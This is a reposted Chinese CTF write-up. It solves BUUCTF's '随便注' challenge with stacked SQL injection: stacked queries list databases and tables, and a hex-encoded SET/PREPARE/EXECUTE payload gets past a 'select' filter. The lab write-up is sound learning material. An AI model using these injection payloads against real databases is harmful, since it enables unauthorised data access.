码上快乐

相关内容   简体   繁体

堆叠注入——BUUCTF-随便注

本文转载自  查看原文  2019-09-07 13:47  509    ctf write up

 

 

 由题目提示知道,这题需要进行sql注入

输入1'发现报错

再输入1';show batabases#出现了一大堆数据库

再输入1';show tables#出现了两个表

 

 

猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现

因为select被过滤了,所以先将select * from `1919810931114514`进行16进制编码

再通过构造payload,得http://677a0eb4-6c6d-4514-b3bb-eacb38a3a347.node1.buuoj.cn?inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

进而得到flag


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 BUUCTF-[强网杯 2019]随便注 buuctf | [强网杯 2019]随便注 BUUCTF | [SUCTF 2019]EasySQL (堆叠注入) BUUCTF-文件包含 BUUCTF-[HCTF 2018]WarmUp 过滤select|update|delete|drop|insert|where的注入 [ 强网杯 2019]随便注 堆叠注入 BUUCTF-不一样的flag 1 buuctf-刮开有奖 buuctf-[网鼎杯 2018]Fakebook 1
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM